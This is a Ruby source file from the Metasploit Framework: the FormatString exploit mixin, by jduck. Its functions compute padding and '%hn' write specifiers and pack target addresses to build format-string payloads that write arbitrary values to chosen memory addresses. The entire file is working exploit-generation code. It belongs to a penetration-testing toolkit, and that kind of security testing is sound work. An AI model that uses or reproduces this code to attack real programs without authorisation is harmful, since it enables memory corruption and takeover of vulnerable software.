metasploit-framework/lib/msf/core/exploit/fmtstr.rb

190 lines
4.1 KiB
Ruby

module Msf
###
#
# This mixin provides a interface to generating format string exploits
# in a more intelligent way.
#
# Author: jduck
# $Id$
###
module Exploit::FormatString
#
# Creates an instance of a format string exploit
#
def initialize(info = {})
super
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target)
arr = Array.new
arr << [ write_what & 0xffff, write_to ]
arr << [ write_what >> 16, write_to + 2 ]
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target)
# break buffer into shorts
arr = fmtstr_gen_array_from_buf(write_to, buffer, targ)
# now build the format string in its entirety
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates and returns an array of what/where pairs from the supplied buffer
#
def fmtstr_gen_array_from_buf(write_to, buffer, targ = target)
# break buffer into shorts
arr = Array.new
off = 0
if ((buffer.length % 2) == 1)
buffer << rand_text(1)
end
while off < buffer.length
# convert short to number
tb = buffer[off,2].unpack('v')[0].to_i
#print_status("%d %d %d" % [off,buffer.length,tb])
addr = write_to + off
arr << [ tb, addr ]
off += 2
end
return arr
end
#
# Generates a format string from an array of value/address pairs
#
def fmtstr_gen_from_array(num_printed, arr, targ = target)
num_pops = targ['NumPops']
num_pad = targ['PadBytes'] || 0
use_dpa = false
use_dpa = targ['UseDPA'] if targ.opts.has_key? 'UseDPA'
# sort the array -- for optimization
arr = arr.sort { |x,y| x[0] <=> y[0] }
fmts = ""
addrs = ""
# DPA pretty much changes everything :)
if use_dpa
num = fmtstr_count_printed(num_printed, num_pad, num_pops, arr, true)
arr.each do |el|
# find out how much to advance the column value
prec = fmtstr_target_short(el[0], num)
if prec > 0
fmts << "%0" + prec.to_s + "x"
end
addrs << [el[1]].pack('V')
fmts << "%" + num_pops.to_s + "$hn"
num_pops += 1
num = el[0]
end
else
num = fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
arr.each do |el|
# find out how much to advance the column value
prec = fmtstr_target_short(el[0], num)
if prec > 0
addrs << rand_text(4)
fmts << "%0" + prec.to_s + "x"
end
addrs << [el[1]].pack('V')
fmts << "%hn"
num = el[0]
end
end
# make sure we dont have bad characters ...
if (bad_idx = has_badchars?(addrs, payload_badchars))
raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]),
"The format string address area contains invalid characters.",
caller
end
# put it all together
stuff = rand_text(num_pad)
stuff << addrs
if not use_dpa
stuff << "%8x" * num_pops
end
stuff << fmts
return stuff
end
#
# Count how many bytes will print before we reach the writing..
#
def fmtstr_count_printed(num_printed, num_pad, num_pops, arr, use_dpa = false)
num = num_printed + num_pad
if not use_dpa
num += (8 * num_pops)
end
npr = num
arr.each do |el|
prec = fmtstr_target_short(el[0], npr)
# this gets popped in order to advance the column (dpa doesn't need these)
if not use_dpa and prec > 0
num += 4
end
# account for the addr to write to
num += 4
npr = el[0]
end
return num
end
#
# generate the number to be used for precision that will create
# the specified value to write
#
def fmtstr_target_short(value, num_printed)
if value < num_printed
return (0x10000 - num_printed) + value
end
return value - num_printed
end
#
# Returns the index of any bad characters found in the supplied buffer.
# (NOTE: copied from encoder.rb)
#
def has_badchars?(buf, badchars)
badchars.each_byte { |badchar|
idx = buf.index(badchar.chr)
if (idx != nil)
return idx
end
}
return nil
end
end
end